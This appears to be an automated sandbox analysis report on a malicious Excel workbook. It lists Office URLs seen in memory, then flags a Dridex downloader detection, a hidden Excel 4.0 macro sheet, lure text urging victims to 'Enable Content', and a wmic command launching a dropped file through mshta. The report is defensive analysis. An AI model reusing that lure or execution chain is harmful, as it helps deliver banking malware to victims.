      Source: EXCEL.EXE, 00000000.00000003.652906974.000000000E377000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652641725.000000000E377000.00000004.00000001.sdmpString found in binary or memory: https://powerlift-frontdesk.acompli.netPowerLiftGymBaseUrlhttps://powerlift.acompli.netSubstrateOffi
      Source: EXCEL.EXE, 00000000.00000003.661389448.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.935100289.000000000E3A0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742268683.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.653934403.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654323256.000000000E3AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660196369.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655655152.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743138102.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652660540.000000000E3B3000.00000004.00000001.sdmpString found in binary or memory: https://powerlift-frontdesk.acompli.netxc
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.661389448.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.935100289.000000000E3A0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742268683.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.653934403.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654323256.000000000E3AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660196369.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655655152.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743138102.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652660540.000000000E3B3000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://powerlift.acompli.net
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
      Source: EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetectz
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
      Source: EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.jsonA
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934298714.000000000E028000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
      Source: EXCEL.EXE, 00000000.00000003.652906974.000000000E377000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652641725.000000000E377000.00000004.00000001.sdmpString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptioneventsMBI_SSLhttps://rpsticket.partnerservices.getmicr
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934298714.000000000E028000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://roaming.edog.
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934298714.000000000E028000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.661389448.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.935100289.000000000E3A0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742268683.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.653934403.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654323256.000000000E3AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660196369.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655655152.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743138102.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652660540.000000000E3B3000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://settings.outlook.com
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.661389448.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.935100289.000000000E3A0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742268683.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.653934403.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654323256.000000000E3AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660196369.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655655152.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743138102.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652660540.000000000E3B3000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://shell.suite.office.com:1443
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.661389448.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.935100289.000000000E3A0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742268683.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.653934403.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654323256.000000000E3AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660196369.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655655152.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743138102.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652660540.000000000E3B3000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://skyapi.live.net/Activity/
      Source: AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
      Source: EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work1
      Source: EXCEL.EXE, 00000000.00000003.652906974.000000000E377000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652641725.000000000E377000.00000004.00000001.sdmpString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/workPowerBIGetDatasetsApihttps://api.pow
      Source: EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/workR
      Source: EXCEL.EXE, 00000000.00000003.652906974.000000000E377000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652641725.000000000E377000.00000004.00000001.sdmpString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/workhttps://login.windows.net/common/oau
      Source: AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://staging.cortana.ai
      Source: EXCEL.EXE, 00000000.00000003.652906974.000000000E377000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652641725.000000000E377000.00000004.00000001.sdmpString found in binary or memory: https://staging.cortana.aiBearer
      Source: EXCEL.EXE, 00000000.00000003.652906974.000000000E377000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652641725.000000000E377000.00000004.00000001.sdmpString found in binary or memory: https://staging.cortana.aihttps://login.windows.net/common/oauth2/authorize
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934298714.000000000E028000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://store.office.cn/addinstemplate
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://store.office.de/addinstemplate
      Source: EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpString found in binary or memory: https://store.office.de/addinstemplateY
      Source: EXCEL.EXE, 00000000.00000003.652660540.000000000E3B3000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.com
      Source: EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.com/Todo-Internal.ReadWrite
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistory
      Source: EXCEL.EXE, 00000000.00000003.652906974.000000000E377000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652641725.000000000E377000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistoryMBI_SSL
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://substrate.office.com/search/api/v2/init
      Source: EXCEL.EXE, 00000000.00000003.661389448.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.935100289.000000000E3A0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742268683.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.653934403.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654323256.000000000E3AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660196369.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655655152.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743138102.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652660540.000000000E3B3000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.com/search/api/v2/init=
      Source: EXCEL.EXE, 00000000.00000003.652906974.000000000E377000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652641725.000000000E377000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.com/search/api/v2/initMBI_SSL
      Source: EXCEL.EXE, 00000000.00000003.661389448.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.935100289.000000000E3A0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742268683.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.653934403.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654323256.000000000E3AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660196369.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655655152.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743138102.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652660540.000000000E3B3000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.comLn
      Source: EXCEL.EXE, 00000000.00000003.661389448.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.935100289.000000000E3A0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742268683.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.653934403.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654323256.000000000E3AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660196369.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655655152.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743138102.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652660540.000000000E3B3000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.comP
      Source: EXCEL.EXE, 00000000.00000003.661389448.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.935100289.000000000E3A0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742268683.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.653934403.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654323256.000000000E3AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660196369.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655655152.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743138102.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652660540.000000000E3B3000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.comUm
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
      Source: EXCEL.EXE, 00000000.00000003.652906974.000000000E377000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652641725.000000000E377000.00000004.00000001.sdmpString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileBearer
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.661389448.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.935100289.000000000E3A0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742268683.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.653934403.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654323256.000000000E3AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660196369.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655655152.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743138102.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652660540.000000000E3B3000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://tasks.office.com
      Source: EXCEL.EXE, 00000000.00000003.661389448.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.935100289.000000000E3A0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742268683.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.653934403.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654323256.000000000E3AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660196369.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655655152.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743138102.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652660540.000000000E3B3000.00000004.00000001.sdmpString found in binary or memory: https://tellmeservice.osi.office.netst
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
      Source: EXCEL.EXE, 00000000.00000003.652906974.000000000E377000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652641725.000000000E377000.00000004.00000001.sdmpString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.htmlInsightsImmersivehttps
      Source: EXCEL.EXE, 00000000.00000003.742853289.000000000E1D2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660247505.000000000E1D2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654236313.000000000E1DC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652925426.000000000E1DC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934591120.000000000E1D2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.778384283.000000000E1D2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.661726514.000000000E1D2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.852724407.000000000E1D2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652824432.000000000E1DC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655830251.000000000E1DC000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.661389448.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.935100289.000000000E3A0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742268683.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.653934403.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654323256.000000000E3AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660196369.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655655152.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743138102.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652660540.000000000E3B3000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://web.microsoftstream.com/video/
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
      Source: EXCEL.EXE, 00000000.00000003.652906974.000000000E377000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652641725.000000000E377000.00000004.00000001.sdmpString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/ExchangeAutoDiscoverhttps:/
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.661389448.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.935100289.000000000E3A0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742268683.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.653934403.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654323256.000000000E3AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660196369.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655655152.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743138102.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652660540.000000000E3B3000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://webshell.suite.office.com
      Source: EXCEL.EXE, 00000000.00000003.652798917.000000000E19D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652985368.000000000E1C0000.00000004.00000001.sdmpString found in binary or memory: https://webshell.suite.office.coma
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652673103.000000000E384000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652641725.000000000E377000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://wus2.contentsync.
      Source: EXCEL.EXE, 00000000.00000003.742853289.000000000E1D2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660247505.000000000E1D2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654236313.000000000E1DC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652925426.000000000E1DC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934591120.000000000E1D2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652673103.000000000E384000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652641725.000000000E377000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.778384283.000000000E1D2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.661726514.000000000E1D2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.852724407.000000000E1D2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652824432.000000000E1DC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655830251.000000000E1DC000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://wus2.pagecontentsync.
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
      Source: EXCEL.EXE, 00000000.00000002.934298714.000000000E028000.00000004.00000001.sdmpString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2)C
      Source: EXCEL.EXE, 00000000.00000003.652673103.000000000E384000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652641725.000000000E377000.00000004.00000001.sdmpString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2Azur
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.661389448.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.935100289.000000000E3A0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742268683.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.653934403.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654323256.000000000E3AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660196369.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655655152.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743138102.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652660540.000000000E3B3000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://www.odwebp.svc.ms

      E-Banking Fraud:

      barindex
      Yara detected Dridex DownloaderShow sources
      Source: Yara matchFile source: C:\ProgramData\lvDMlIDBF.rtf, type: DROPPED

      System Summary:

      barindex
      Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
      Source: Screenshot number: 4Screenshot OCR: ENABLE EDITING FROM YELLOW BAR ABOVE 4 Once you have clicked, please click "Enable Content" 5 6
      Source: Screenshot number: 4Screenshot OCR: DOCUMENT IS PROTECTED 2 Open this document with Desktop Version of Microsoft Office Excel. 3 CLICK
      Source: Screenshot number: 4Screenshot OCR: Enable Content" 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26
      Source: Screenshot number: 8Screenshot OCR: ENABLE EDITING FROM YELLOW BAR ABOVE Once you have clicked, please click "Enable Content" H J K L
      Source: Screenshot number: 8Screenshot OCR: DOCUMENT IS PROTECTED Open this document with Desktop Version of Microsoft Office Excel. CLICK ENA
      Source: Screenshot number: 8Screenshot OCR: Enable Content" H J K L , M , N , O , P Q R S ^ Sheet1 CD Ready O Type here to search i 'I K
      Source: Screenshot number: 12Screenshot OCR: ENABLE EDITING FROM YELLOW BAR ABOVE Once you have clicked, please click "Enable Content" H J K L
      Source: Screenshot number: 12Screenshot OCR: DOCUMENT IS PROTECTED Open this document with Desktop Version of Microsoft Office Excel. CLICK ENA
      Source: Screenshot number: 12Screenshot OCR: Enable Content" H J K L , M , N , O , P Q R S ^ Sheet1 CD Ready O Type here to search i 'I K
      Found Excel 4.0 Macro with suspicious formulasShow sources
      Source: 4310352755503838173672.xlsbInitial sample: EXEC
      Found protected and hidden Excel 4.0 Macro sheetShow sources
      Source: 4310352755503838173672.xlsbInitial sample: Sheet name: Macro1
      Contains functionality to create processes via WMIShow sources
      Source: EXCEL.EXE, 00000000.00000002.936525608.0000000011690000.00000004.00000001.sdmpBinary or memory string: C:\Users\user\Documents\C:\Windows\SysWOW64\Wbem\wmic.exewmic process call create "mshta C:\ProgramData\lvDMlIDBF.rtf"C:\Windows\System32\Wbem\wmic.exeWinSta0\Default=::=::\ALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Users\user\AppData\RoamingCommonProgramFiles=C:\Program Files\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=computerComSpec=C:\Windows\system32\cmd.exeDriverData=C:\Windows\System32\Drivers\DriverDataHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\computerNUMBER_OF_PROCESSORS=4OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 85 Stepping 7, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=5507ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPSModulePath=C:\Program 